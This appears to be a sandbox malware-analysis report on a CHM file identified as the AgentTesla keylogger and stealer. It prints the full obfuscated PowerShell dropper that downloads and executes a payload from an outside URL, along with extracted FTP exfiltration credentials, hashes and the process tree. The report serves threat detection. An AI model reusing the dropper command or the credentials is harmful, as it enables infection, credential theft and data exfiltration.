Overview

overview

10

Static

static

fwdPacking...B).msg

windows10-2004-x64

3

Packing List.chm

windows10-2004-x64

10

Analysis

  • max time kernel
    91s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2022 20:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Packing List.chm

  • Size

    13KB

  • MD5

    08cac56b75979c1f3bfc2e83e123a2fc

  • SHA1

    56227c920783d547a673e0de919f438dba846c01

  • SHA256

    11731e8a97c3ced6e50ffa011b04bc6b54cc5e4ee1ccf2c4fc70247b7ae4528b

  • SHA512

    3be2746d1a0179642db2e7a85ba5cb4815e95582e56efb3e981755ecc50fc6590d425993bfb8f3685d3d79871ec88c597c545850929595c04abb60690169ac4b

  • SSDEEP

    192:tyBAu4E8Y/p6efAPaiQ4nggjClAgLZkByk0GAN:tyauqYR8s4ggjCb5k0

Score
10/10
agentteslacollectionkeyloggerspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://mgcpakistan.com/yimu.txt

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    ftp.onogost.com
  • Port:
    21
  • Username:
    infoo@onogost.com
  • Password:
    boygirl123456

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\Packing List.chm"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4868
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://mgcpakistan.com/yimu.txt')|P
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4148
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        3⤵
        • Accesses Microsoft Outlook profiles
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:2968

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Email Collection

1
T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\73ab9a28-0688-49e7-b77d-eacdd07237df\AgileDotNetRT64.dll
    Filesize

    75KB

    MD5

    42b2c266e49a3acd346b91e3b0e638c0

    SHA1

    2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

    SHA256

    adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

    SHA512

    770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

    Download Submit
  • memory/2968-142-0x0000000005510000-0x0000000005AB4000-memory.dmp
    Filesize

    5.6MB

    Download
  • memory/2968-143-0x0000000004E90000-0x0000000004F2C000-memory.dmp
    Filesize

    624KB

    Download
  • memory/2968-147-0x0000000006850000-0x000000000685A000-memory.dmp
    Filesize

    40KB

    Download
  • memory/2968-146-0x00000000068D0000-0x0000000006962000-memory.dmp
    Filesize

    584KB

    Download
  • memory/2968-145-0x0000000006170000-0x00000000061C0000-memory.dmp
    Filesize

    320KB

    Download
  • memory/2968-140-0x0000000000435A6E-mapping.dmp
    Download
  • memory/2968-139-0x0000000000400000-0x000000000043A000-memory.dmp
    Filesize

    232KB

    Download
  • memory/2968-144-0x0000000005AC0000-0x0000000005B26000-memory.dmp
    Filesize

    408KB

    Download
  • memory/4148-138-0x00007FFA8C880000-0x00007FFA8C9CE000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/4148-133-0x0000000000000000-mapping.dmp
    Download
  • memory/4148-141-0x00007FFA91B00000-0x00007FFA925C1000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4148-135-0x00007FFA91B00000-0x00007FFA925C1000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4148-134-0x000002974F1D0000-0x000002974F1F2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/4148-136-0x00007FFA91B00000-0x00007FFA925C1000-memory.dmp
    Filesize

    10.8MB

    Download